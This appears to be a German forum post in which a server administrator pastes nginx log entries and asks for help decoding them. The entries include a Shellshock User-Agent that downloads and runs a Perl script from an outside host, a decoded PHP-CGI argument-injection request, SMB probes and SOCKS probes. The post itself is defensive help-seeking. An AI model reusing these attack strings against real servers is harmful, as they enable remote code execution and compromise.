-- - [18/Aug/2016:12:31:21 +0200] "GET / HTTP/1.1" 404 162 "-" "Python-urllib/2.6"
-- - [18/Aug/2016:12:31:24 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:12:31:32 +0200] "GET / HTTP/1.1" 400 264 "-" "Python-urllib/2.6"
-- - [18/Aug/2016:12:31:33 +0200] "GET / HTTP/1.1" 400 264 "-" "() { :;}; /bin/bash -c \x22wget -qO - hxxp://pinkiceberg.com/.mail | perl ; cd /tmp ; curl -O hxxp://pinkiceberg.com/.mail ; fetch hxxp://pinkiceberg.com/.mail ; perl .mail ;rm -rf .mail* \x22""]
-- - [18/Aug/2016:09:21:01 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:03 +0200] "" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:03 +0200] "" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:04 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:04 +0200] "" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:04 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:05 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:08 +0200] "quit" 400 166 "-" "-"
-- - [18/Aug/2016:09:21:10 +0200] "" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:11 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:12:31:21 +0200] "GET / HTTP/1.1" 404 162 "-" "Python-urllib/2.6"
-- - [18/Aug/2016:12:31:24 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:12:31:32 +0200] "GET / HTTP/1.1" 400 264 "-" "Python-urllib/2.6"
-- - [18/Aug/2016:12:31:33 +0200] "GET / HTTP/1.1" 400 264 "-" "() { :;}; /bin/bash -c \x22wget -qO - hxxp://pinkiceberg.com/.mail | perl ; cd /tmp ; curl -O hxxp://pinkiceberg.com/.mail ; fetch hxxp://pinkiceberg.com/.mail ; perl .mail ;rm -rf .mail* \x22""]
"- - - [18/Aug/2016:05:19:13 +0200] "-" 400 0 "-" "-"
- - - [18/Aug/2016:05:19:14 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
- - - [18/Aug/2016:06:02:20 +0200] "-" 400 0 "-" "-"
- - - [18/Aug/2016:06:02:21 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- - [18/Aug/2016:07:07:13 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:07:07:19 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
- - [18/Aug/2016:08:02:07 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
- - [18/Aug/2016:08:53:59 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:09:06:00 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:09:06:00 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- [18/Aug/2016:10:18:46 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:10:35:29 +0200] "-" 400 0 "-" "-"
- [18/Aug/2016:10:35:30 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- - [18/Aug/2016:11:07:01 +0200] "-" 400 0 "-" "-"
- [18/Aug/2016:11:07:02 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- - [18/Aug/2016:11:07:06 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:11:07:07 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- [18/Aug/2016:13:01:38 +0200] "-" 400 0 "-" "-"
- [18/Aug/2016:13:01:39 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-""]
- - - [18/Aug/2016:05:19:14 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
- - - [18/Aug/2016:06:02:20 +0200] "-" 400 0 "-" "-"
- - - [18/Aug/2016:06:02:21 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- - [18/Aug/2016:07:07:13 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:07:07:19 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
- - [18/Aug/2016:08:02:07 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
- - [18/Aug/2016:08:53:59 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:09:06:00 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:09:06:00 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- [18/Aug/2016:10:18:46 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:10:35:29 +0200] "-" 400 0 "-" "-"
- [18/Aug/2016:10:35:30 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- - [18/Aug/2016:11:07:01 +0200] "-" 400 0 "-" "-"
- [18/Aug/2016:11:07:02 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- - [18/Aug/2016:11:07:06 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:11:07:07 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- [18/Aug/2016:13:01:38 +0200] "-" 400 0 "-" "-"
- [18/Aug/2016:13:01:39 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-""]
Einen Eintrag aus dem 1. Log konnte ich (wenn ich richtig liege) auswerten der sieht das so aus:
- - [18/Aug/2016:11:15:16 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69 %6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%6 4%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
=
176.94.194.90 - - [18/Aug/2016:11:15:16 0200] "POST /phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosi n.simulation=on -d disable_functions="" -d open_base%6 4ir=none -d auto_prepend_file=php://input -n HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; hxxp://www.google.com/bot.html)"
Der Ursprung der IP-Adressen scheinen aus China zu stammen. Bei der Auswertung kommen ich leider bei folgenden Einträgen nicht weiter und bisher leider auch keine Idee für eine dekodierung :wall:
- - [18/Aug/2016:12:58:45 +0200] "\x04\x01\x00P\xB4\xA3qR\x00" 400 166 "-" "-"
- - [18/Aug/2016:15:34:15 +0200] "\x05\x02\x00\x02" 400 166 "-" "-"
Auch im Access - Log /var/log/nginx/nginx_devi_access.log habe ich leider keine Idee wo ich dort ansetzen soll.
Auf dem Server läuft Debian 7, nginx 1.2.1 und PHP 5.6.24-1~dotdeb+7.1 (fpm-fcgi)
Vielen Dank für Eure Hilfe
Zuletzt bearbeitet: